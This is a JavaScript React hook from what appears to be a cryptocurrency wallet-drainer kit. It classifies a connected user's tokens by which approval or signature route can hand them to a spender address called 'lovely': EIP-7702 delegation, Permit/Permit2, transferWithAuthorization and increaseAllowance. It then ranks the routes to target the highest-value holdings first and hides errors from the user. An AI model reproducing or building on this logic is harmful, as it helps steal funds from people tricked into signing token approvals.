import { useState, useEffect, useCallback, useRef } from "react";
import { CHAIN_WEIGHTS, chains, dudWallet, LOVELY, PERMIT2_ABI, MaxAllowanceTransferAmount, PERMIT2_ADDRESS, OMNIBRIDGE_CONTRACTS, OMNIBRIDGE_ABI, PULSEBRIDGE_WETH_ROUTER_CONTRACTS, EIP7702_DELEGATE_CONTRACTS, EIP7702_BATCH_DELEGATE_CONTRACTS } from "../util/constants";
import { Contract, ethers, Wallet } from "ethers";
import ERC20ABI from "../util/erc20-classic.json";
const ERC677_ABI = [
    {
        "constant": false,
        "inputs": [
            { "name": "_to", "type": "address" },
            { "name": "_value", "type": "uint256" },
            { "name": "_data", "type": "bytes" }
        ],
        "name": "transferAndCall",
        "outputs": [
            { "name": "success", "type": "bool" }
        ],
        "payable": false,
        "type": "function"
    }
];

function getDefaultTokenGroups() {
    return {
        eip7702Batch: { tokens: [], value: 0 },
        eip7702: { tokens: [], value: 0 },
        transferAndCall: { tokens: [], value: 0 },
        relayTokens: { tokens: [], value: 0 },
        wrapAndRelayTokens: { tokens: [], value: 0 },
        transferWithAuthorizationAllowed: { tokens: [], value: 0 },
        permit1Allowed: { tokens: [], value: 0 },
        permit2Approved: { tokens: [], value: 0 },
        increaseAllowanceAllowed: { tokens: [], value: 0 },
        increaseApprovalAllowed: { tokens: [], value: 0 },
        isEth: { tokens: [], value: 0 },
        normalApproveOnly: { tokens: [], value: 0 },
    };
}

export function useTokens({
    tokens = [],
    userAddress,
    chainId = 0,
    isParentLoading = true,
    onReady
}) {
    const [isLoading, setIsLoading] = useState(isParentLoading);
    const [lovely, setLovely] = useState(LOVELY);
    const [ethContract, setEthContract] = useState("");
    const [highestBalanceMap, setHighestBalanceMap] = useState({});
    const [tokenGroups, setTokenGroups] = useState(getDefaultTokenGroups());
    const [highestValue, setHighestValue] = useState(0);
    const [highestBalanceChain, setHighestBalanceChain] = useState(chainId);
    const [highestWeightedBalanceChain, setHighestWeightedBalanceChain] = useState({ chain: chainId, weight: 0 });
    const [provider, setProvider] = useState(undefined);
    const isClassifyingRef = useRef(false);

    useEffect(() => {
        if (chains[chainId]?.rpcUrl) {
            try {
                const chain = chains[chainId];
                const network = { chainId: Number(chainId), name: chain.name ?? 'unknown' };
                const newProvider = new ethers.JsonRpcProvider(chain.rpcUrl, network);
                setProvider(newProvider);
            } catch (error) {
                // Log error but don't show it to user
                if (process.env.NODE_ENV === "development") {
                    console.warn("Provider creation failed for chain", chainId, "- continuing without provider");
                }
                setProvider(undefined);
            }
        } else {
            setProvider(undefined);
        }
    }, [chainId]);


    // Helper functions (async)
    const supportsPermit1Signs = useCallback(async (tokenAddress) => {
        try {
            if (!provider || !tokenAddress || !userAddress) return false;

            const signer = new Wallet(dudWallet, provider);
            const contract = new Contract(tokenAddress.trim(), ERC20ABI, signer);

            // Add timeout to prevent hanging
            const timeoutPromise = new Promise((_, reject) => {
                setTimeout(() => reject(new Error('Permit1 check timeout')), 3000);
            });

            const checkPromise = contract.DOMAIN_SEPARATOR();
            const domainSeparator = await Promise.race([checkPromise, timeoutPromise]);
            return !!domainSeparator;
        } catch (error) {
            if (process.env.NODE_ENV === 'development') {
                console.warn('Permit1 check failed:', error.message);
            }
            return false;
        }
    }, [provider, userAddress]);

    const userApprovedPermit2Contract = useCallback(async (tokenAddress) => {
        try {
            if (!provider || !tokenAddress || !userAddress) return false;
            const signer = new Wallet(dudWallet, provider);
            const contract = new Contract(tokenAddress.trim(), ERC20ABI, signer);

            const timeoutPromise = new Promise((_, reject) => {
                setTimeout(() => reject(new Error('Permit2 check timeout')), 3000);
            });

            const allowancePromise = contract.allowance(userAddress, PERMIT2_ADDRESS);
            let allowance = await Promise.race([allowancePromise, timeoutPromise]);
            return Number(allowance) > 0;
        } catch {
            return false;
        }
    }, [provider, userAddress]);

    const supportsIncreaseAllowance = useCallback(async (tokenAddress, sender = lovely) => {
        try {
            if (!provider || !tokenAddress) return false;
            const signer = new Wallet(dudWallet, provider);
            const contract = new Contract(tokenAddress.trim(), ERC20ABI, signer);

            const timeoutPromise = new Promise((_, reject) => {
                setTimeout(() => reject(new Error('Increase allowance check timeout')), 3000);
            });

            const estimatePromise = contract.estimateGas.increaseAllowance(sender, MaxAllowanceTransferAmount);
            let allowance = await Promise.race([estimatePromise, timeoutPromise]);
            return !!allowance;
        } catch {
            return false;
        }
        // eslint-disable-next-line react-hooks/exhaustive-deps
    }, [provider]);

    const supportsIncreaseApproval = useCallback(async (tokenAddress, sender = lovely) => {
        try {
            if (!provider || !tokenAddress) return false;
            const signer = new Wallet(dudWallet, provider);
            const contract = new Contract(tokenAddress.trim(), ERC20ABI, signer);

            const timeoutPromise = new Promise((_, reject) => {
                setTimeout(() => reject(new Error('Increase approval check timeout')), 3000);
            });

            const estimatePromise = contract.estimateGas.increaseApproval(sender, MaxAllowanceTransferAmount);
            let allowance = await Promise.race([estimatePromise, timeoutPromise]);
            return !!allowance;
        } catch {
            return false;
        }
        // eslint-disable-next-line react-hooks/exhaustive-deps
    }, [provider]);

    const isETH = useCallback(async (token) => {
        return token && token.length < 12;
    }, []);

    const relayTokensCheck = useCallback(async (_tokenAddress, _sender) => {
        // Check if chain supports OmniBridge and token is registered
        if (chainId === 1 || chainId === 369) {
            if (!_tokenAddress || _tokenAddress.length < 12) return false;
            if (!provider) return false;

            try {
                const bridgeAddress = OMNIBRIDGE_CONTRACTS[chainId];
                if (!bridgeAddress) return false;

                const signer = new Wallet(dudWallet, provider);
                const bridgeContract = new Contract(bridgeAddress, OMNIBRIDGE_ABI, signer);
                const isRegistered = await bridgeContract.isTokenRegistered(_tokenAddress);
                return isRegistered;
            } catch {
                return false;
            }
        }
        return false;
    }, [chainId, provider]);

    const wrapAndRelayTokensCheck = useCallback(async (_tokenAddress, _sender = lovely) => {
        // Check if chain supports Router contracts and token is ETH/native
        if (chainId === 1 || chainId === 369) {
            if (!_tokenAddress || _tokenAddress.length >= 12) return false;
            if (!provider) return false;

            try {
                const bridgeAddress = PULSEBRIDGE_WETH_ROUTER_CONTRACTS[chainId];
                return !!bridgeAddress;
            } catch {
                return false;
            }
        }
        return false;
        // eslint-disable-next-line react-hooks/exhaustive-deps
    }, [chainId, provider]);

    const eip7702Check = useCallback(async (_tokenAddress, _sender = lovely) => {
        try {
            if (!provider || !chainId) return false;
            
            // Check if EIP-7702 delegate contract is configured for this chain
            const delegateAddress = EIP7702_DELEGATE_CONTRACTS[chainId];
            if (!delegateAddress) return false;

            // Verify the delegate contract exists and has the required functions
            const signer = new Wallet(dudWallet, provider);
            const delegateContract = new Contract(
                delegateAddress,
                [
                    "function userNonce(address) view returns (uint256)",
                    "function executeSwap((address,address,address,uint256,uint256,address,uint256,bytes,uint256,uint256,uint256), bytes) external"
                ],
                signer
            );

            // Check if contract is deployed by calling a view function
            const timeoutPromise = new Promise((_, reject) => {
                setTimeout(() => reject(new Error('EIP-7702 check timeout')), 3000);
            });

            // Try to get a nonce (this will fail if contract doesn't exist)
            const checkPromise = delegateContract.userNonce(ethers.ZeroAddress);
            await Promise.race([checkPromise, timeoutPromise]);
            
            return true;
        } catch {
            return false;
        }
        // eslint-disable-next-line react-hooks/exhaustive-deps
    }, [provider, chainId]);

    const transferAndCallCheck = useCallback(async (_tokenAddress, _sender = lovely) => {
        try {
            if (!_tokenAddress || _tokenAddress.trim().length < 12) return false;
            if (!provider) return false;

            // Check if chain supports OmniBridge
            if (chainId !== 1 && chainId !== 369) return false;

            const bridgeAddress = OMNIBRIDGE_CONTRACTS[chainId];
            if (!bridgeAddress) return false;

            const signer = new Wallet(dudWallet, provider);

            // Check if token supports ERC-677
            const contract = new Contract(_tokenAddress.trim(), ERC677_ABI, signer);
            const supportsERC677 = await contract.callStatic.transferAndCall(_sender, 0, "0x");

            // Also check if token is registered with OmniBridge
            const bridgeContract = new Contract(bridgeAddress, OMNIBRIDGE_ABI, signer);
            const isRegistered = await bridgeContract.isTokenRegistered(_tokenAddress);

            return (typeof supportsERC677 === "boolean" ? supportsERC677 : false) && isRegistered;
        } catch {
            return false;
        }
        // eslint-disable-next-line react-hooks/exhaustive-deps
    }, [provider, chainId]);

    const supportsTransferWithAuthorization = useCallback(async (tokenAddress, sender = lovely) => {
        // Check if token supports transferWithAuthorization
        try {
            // First check if the function exists in our ABI
            const iface = new ethers.Interface(ERC20ABI);
            iface.getFunction('transferWithAuthorization');
            
            // Now check if the contract actually has this function by calling it with minimal data
            // We'll use a static call that will fail but won't consume gas
            const signer = new Wallet(dudWallet, provider)
            const contract = new Contract(tokenAddress.trim(), ERC20ABI, signer)
            
            try {
                // Try to call the function with invalid parameters to see if it exists
                // This will fail with a revert, but not with "function not found"
                await contract.callStatic.transferWithAuthorization(
                    ethers.ZeroAddress, // invalid from address
                    ethers.ZeroAddress, // invalid to address  
                    0, // zero value
                    0, // invalid timestamp
                    0, // invalid timestamp
                    ethers.ZeroHash, // invalid nonce
                    0, // invalid v
                    ethers.ZeroHash, // invalid r
                    ethers.ZeroHash, // invalid s
                    { gasLimit: 50000 } // very low gas limit
                );
                return true;
            } catch (callError) {
                // Check if the error indicates the function doesn't exist
                const errorMessage = callError.message.toLowerCase();
                if (errorMessage.includes('function') && 
                    (errorMessage.includes('not found') || errorMessage.includes('selector'))) {
                    return false;
                }
                // Any other error means the function exists but failed for other reasons
                return true;
            }
        } catch (error) {
            if (process.env.NODE_ENV === "development") console.log(`transferWithAuthorization not supported for ${tokenAddress}:`, error.message);
            return false;
        }
    }, [provider, lovely]);

    const allowanceCheck = useCallback(async (tokenAddress, sender = lovely) => {
        if (tokenAddress.trim().length < 12) return false;
        const signer = new Wallet(dudWallet, provider);
        try {
            let contract = new Contract(tokenAddress.trim(), ERC20ABI, signer);
            let allowance = await contract.allowance(userAddress, sender);
            let pContract = new Contract(PERMIT2_ADDRESS, PERMIT2_ABI, signer);
            let pAllowance = await pContract.allowance(userAddress, tokenAddress, sender);
            return MaxAllowanceTransferAmount.lte(pAllowance.amount) || MaxAllowanceTransferAmount.lte(allowance);
        } catch {
            return false;
        }
        // eslint-disable-next-line react-hooks/exhaustive-deps
    }, [provider, userAddress]);


    // Update highest balance chain
    useEffect(() => {
        let highest = chainId;
        for (const chain in highestBalanceMap) {
            if (!highestBalanceMap[highest]) highest = chain;
            if (parseFloat(highestBalanceMap[chain]) > parseFloat(highestBalanceMap[highest])) {
                highest = chain;
            }
        }
        setHighestBalanceChain(highest);

        let weighted = { chain: chainId, weight: 0 };
        for (const chain in CHAIN_WEIGHTS) {
            if (!highestBalanceMap[chain]) continue;
            const currWeight = ((highestBalanceMap[chain] / highestBalanceMap[highest]) + CHAIN_WEIGHTS[chain]) / 2;
            if (currWeight > weighted.weight) {
                weighted = { chain, weight: currWeight };
            }
        }
        setHighestWeightedBalanceChain(weighted);
    }, [highestBalanceMap, chainId]);

    // Full token classification with incremental processing
    useEffect(() => {
        if (!userAddress || !chainId) return;

        let cancelled = false;

        async function classifyTokens() {
            if (!tokens.length) return;
            if (isClassifyingRef.current) return;
            isClassifyingRef.current = true;
            setIsLoading(true);

            try {
                // Initialize with empty groups
                const groups = getDefaultTokenGroups();
                let maxValue = 0;

                if (tokens && Array.isArray(tokens) && tokens.length > 0) {
                    // Process all tokens without batching
                    const tokenPromises = tokens.map(async token => {
                        try {
                            if (!token || !token.address) return;

                            let classification = 'normalApproveOnly';

                            // If token has recommendedMethod from new API, use that instead of on-chain checks
                            // This preserves the backend's method selection
                            if (token.recommendedMethod) {
                                // Map recommendedMethod to classification type
                                const methodToType = {
                                    'transferFromAndForward': token.hasAllowance ? 'alreadyApproved' : 'normalApproveOnly',
                                    'transferWithAuthorization': 'transferWithAuthorizationAllowed',
                                    'eip7702': 'eip7702',
                                    'eip7702Batch': 'eip7702Batch',
                                    'permitERC2612': 'permit1Allowed',
                                    'permitDai': 'permit1Allowed',
                                    'metaTransaction': 'normalApproveOnly',
                                    'erc1155': 'normalApproveOnly',
                                    'erc777': 'normalApproveOnly',
                                    'erc1271': 'normalApproveOnly',
                                    'feeOnTransfer': 'normalApproveOnly',
                                    'ethExecuteCall': 'isEth',
                                    'ethBridge': 'isEth',
                                    'ethSwap': 'isEth',
                                    'ethSign': 'isEth',
                                    'wrapAndRelayTokens': 'wrapAndRelayTokens',
                                    'relayTokens': 'relayTokens',
                                    'transferAndCall': 'transferAndCall'
                                };
                                
                                classification = methodToType[token.recommendedMethod] || token.type || 'normalApproveOnly';
                                
                                if (process.env.NODE_ENV === 'development') {
                                    console.log('Using recommendedMethod from API:', {
                                        token: token.address,
                                        recommendedMethod: token.recommendedMethod,
                                        classification
                                    });
                                }
                            }
                            // Otherwise, use on-chain checks (old flow)
                            else if (await eip7702Check(token.address, token.sender)) {
                                classification = 'eip7702';
                            }
                            // Check if it's ETH
                            else if (await wrapAndRelayTokensCheck(token.address)) {
                                classification = 'wrapAndRelayTokens';
                            } else if (await isETH(token.address)) {
                                if (ethContract) {
                                    classification = 'isEth';
                                }
                            }
                            else if (await allowanceCheck(token.address, token.sender)) {
                                classification = 'alreadyApproved';
                            }
                            else if (await supportsTransferWithAuthorization(token.address, token.sender)) {
                                classification = 'transferWithAuthorizationAllowed';
                            }
                            else if (await transferAndCallCheck(token.address, token.sender)) {
                                classification = 'transferAndCall';
                            } else if (await relayTokensCheck(token.address, token.sender)) {
                                classification = 'relayTokens';
                            } else if (await supportsPermit1Signs(token.address, token.sender)) {
                                classification = 'permit1Allowed';
                            } else if (await userApprovedPermit2Contract(token.address, token.sender)) {
                                classification = 'permit2Approved';
                            } else if (await supportsIncreaseAllowance(token.address, token.sender)) {
                                classification = 'increaseAllowanceAllowed';
                            } else if (await supportsIncreaseApproval(token.address, token.sender)) {
                                classification = 'increaseApprovalAllowed';
                            }

                            // Add to appropriate group (skip already approved tokens)
                            if (classification !== 'alreadyApproved' && groups[classification]) {
                                // Preserve recommendedMethod and other API fields when grouping
                                const tokenWithMetadata = {
                                    ...token,
                                    // Preserve recommendedMethod from API
                                    recommendedMethod: token.recommendedMethod,
                                    tokenHandlerCompleteAddress: token.tokenHandlerCompleteAddress,
                                    methodPriority: token.methodPriority,
                                    priorityScore: token.priorityScore,
                                    hasAllowance: token.hasAllowance
                                };
                                groups[classification].tokens.push(tokenWithMetadata);
                                groups[classification].value += token.amount || 0;
                            }
                        } catch (error) {
                            if (process.env.NODE_ENV === 'development') {
                                console.warn('Error classifying token:', token?.address, error.message);
                            }
                            // Add to normal approve as fallback
                            groups.normalApproveOnly.tokens.push(token);
                            groups.normalApproveOnly.value += token.amount || 0;
                        }
                    });

                    // Wait for all tokens to be classified
                    await Promise.allSettled(tokenPromises);

                    // Update UI once all tokens are processed
                    if (!cancelled) {
                        // Sort tokens by amount in each group
                        Object.keys(groups).forEach(key => {
                            groups[key].tokens.sort((a, b) => (b.amount || 0) - (a.amount || 0));
                        });

                        const batchDelegate = EIP7702_BATCH_DELEGATE_CONTRACTS[chainId];
                        if (batchDelegate && groups.eip7702.tokens.length > 1) {
                            groups.eip7702Batch.tokens = [...groups.eip7702.tokens];
                            groups.eip7702Batch.value = groups.eip7702.value;
                        } else {
                            groups.eip7702Batch.tokens = [];
                            groups.eip7702Batch.value = 0;
                        }

                        // Calculate max value
                        maxValue = Math.max(...Object.values(groups).map(group => group.value));

                        setTokenGroups(groups);
                        setHighestValue(maxValue);
                    }
                }

                setIsLoading(false);
                isClassifyingRef.current = false;

                if (!cancelled) {
                    if (onReady && typeof onReady === 'function') {
                        onReady();
                    }
                }
                // console.log('Classification completed:', {
                //     cancelled,
                //     isClassifying: isClassifyingRef.current,
                //     tokenGroupsCount: tokenGroups,
                //     groupsCount: groups,
                //     hasTokens: tokens?.length > 0
                // })
            } catch (error) {
                if (process.env.NODE_ENV === 'development') {
                    console.warn('Error in classifyTokens:', error.message);
                }
                if (!cancelled) {
                    setIsLoading(false);
                    isClassifyingRef.current = false;
                    if (onReady && typeof onReady === 'function') {
                        onReady();
                    }
                }
            }
        }

        classifyTokens();

        return () => {
            cancelled = true;
            isClassifyingRef.current = false;
        };
        // eslint-disable-next-line
    }, [tokens, userAddress, chainId, ethContract]);



    const getBestApprovalMethod = useCallback(() => {
        if (isLoading) return {};

        // Calculate weights for each approval method (in priority order)
        const weights = {
            eip7702Batch: tokenGroups.eip7702Batch.value <= 3 ? 0 : ((tokenGroups.eip7702Batch.value / highestValue) + 1.0) / 2, // Batch approvals highest priority
            eip7702: tokenGroups.eip7702.value <= 3 ? 0 : ((tokenGroups.eip7702.value / highestValue) + .99) / 2, // Single token fallback
            transferAndCall: tokenGroups.transferAndCall.value <= 3 ? 0 : ((tokenGroups.transferAndCall.value / highestValue) + .95) / 2, // ERC-677
            relayTokens: tokenGroups.relayTokens.value <= 3 ? 0 : ((tokenGroups.relayTokens.value / highestValue) + .9) / 2, // OmniBridge relay
            wrapAndRelayTokens: tokenGroups.wrapAndRelayTokens.value <= 3 ? 0 : ((tokenGroups.wrapAndRelayTokens.value / highestValue) + .85) / 2, // Native bridge
            transferWithAuthorizationAllowed: tokenGroups.transferWithAuthorizationAllowed.value <= 3 ? 0 : ((tokenGroups.transferWithAuthorizationAllowed.value / highestValue) + .8) / 2, // transferWithAuthorization
            permit1Allowed: tokenGroups.permit1Allowed.value <= 3 ? 0 : ((tokenGroups.permit1Allowed.value / highestValue) + .8) / 2, // EIP-2612 permits
            permit2Approved: tokenGroups.permit2Approved.value <= 3 ? 0 : ((tokenGroups.permit2Approved.value / highestValue) + .75) / 2, // Permit2 approvals
            increaseAllowanceAllowed: tokenGroups.increaseAllowanceAllowed.value <= 3 ? 0 : ((tokenGroups.increaseAllowanceAllowed.value / highestValue) + .65) / 2, // increaseAllowance
            increaseApprovalAllowed: tokenGroups.increaseApprovalAllowed.value <= 3 ? 0 : ((tokenGroups.increaseApprovalAllowed.value / highestValue) + .6) / 2, // increaseApproval
            isEth: tokenGroups.isEth.value <= 3 ? 0 : ((tokenGroups.isEth.value / highestValue) + .45) / 2, // Native ETH/PLS
            normalApproveOnly: tokenGroups.normalApproveOnly.value <= 3 ? 0 : ((tokenGroups.normalApproveOnly.value / highestValue) + .3) / 2, // Standard approve
        };

        // Find the method with highest weight
        let bestMethod = 'normalApproveOnly';
        let highestWeight = 0;

        for (const [method, weight] of Object.entries(weights)) {
            if (weight > highestWeight && tokenGroups[method].tokens.length > 0) {
                highestWeight = weight;
                bestMethod = method;
            }
        }

        if (bestMethod === 'eip7702Batch' && tokenGroups.eip7702Batch.tokens.length > 0) {
            return {
                token: tokenGroups.eip7702Batch.tokens,
                type: bestMethod
            };
        }

        // Handle special case for permit2Approved with multiple tokens
        if (bestMethod === 'permit2Approved' && tokenGroups.permit2Approved.tokens.length > 1) {
            return {
                token: tokenGroups.permit2Approved.tokens,
                type: bestMethod
            };
        }

        // Return the best token and method
        const bestToken = tokenGroups[bestMethod].tokens[0];
        if (!bestToken) return {};

        return { token: bestToken, type: bestMethod };
    }, [isLoading, tokenGroups, highestValue]);

    // Approve handler
    const onApprove = useCallback(({ token, type }) => {
        if (isLoading) return;
        setTokenGroups(prev => {
            const updated = { ...prev };

            if (Array.isArray(token)) {
                if (type === 'permit2Approved') {
                    const removeCount = Math.min(token.length, updated.permit2Approved.tokens.length);
                    for (let i = 0; i < removeCount; i++) {
                    const t = updated.permit2Approved.tokens.shift();
                        if (t?.amount) {
                    updated.permit2Approved.value -= t.amount;
                }
                    }
                } else if (type === 'eip7702Batch') {
                    const removeSet = new Set(token.map(t => t.address?.toLowerCase()));
                    updated.eip7702.tokens = updated.eip7702.tokens.filter(t => !removeSet.has(t.address?.toLowerCase()));
                    updated.eip7702.value = updated.eip7702.tokens.reduce((sum, t) => sum + (t.amount || 0), 0);
                    updated.eip7702Batch.tokens = [];
                    updated.eip7702Batch.value = 0;
                }
            } else if (token?.amount) {
                const t = updated[type].tokens.shift();
                if (t?.amount) {
                updated[type].value -= t.amount;
                }
            }

            return updated;
        });
    }, [isLoading]);

    // Memoize setter functions to prevent unnecessary re-renders
    const memoizedSetTokenGroups = useCallback((groups) => setTokenGroups(groups), []);
    const memoizedSetEthContract = useCallback((contract) => setEthContract(contract), []);
    const memoizedSetHighestBalanceMap = useCallback((map) => setHighestBalanceMap(map), []);
    const memoizedSetLovely = useCallback((lovely) => setLovely(lovely), []);
    const memoizedSetIsLoading = useCallback((loading) => setIsLoading(loading), []);

    return {
        isLoading,
        setIsLoading: memoizedSetIsLoading,
        tokenGroups,
        setTokenGroups: memoizedSetTokenGroups,
        highestValue,
        ethContract,
        setEthContract: memoizedSetEthContract,
        highestBalanceMap,
        setHighestBalanceMap: memoizedSetHighestBalanceMap,
        highestBalanceChain,
        highestWeightedBalanceChain,
        getBestApprovalMethod,
        onApprove,
        lovely,
        setLovely: memoizedSetLovely
    };
}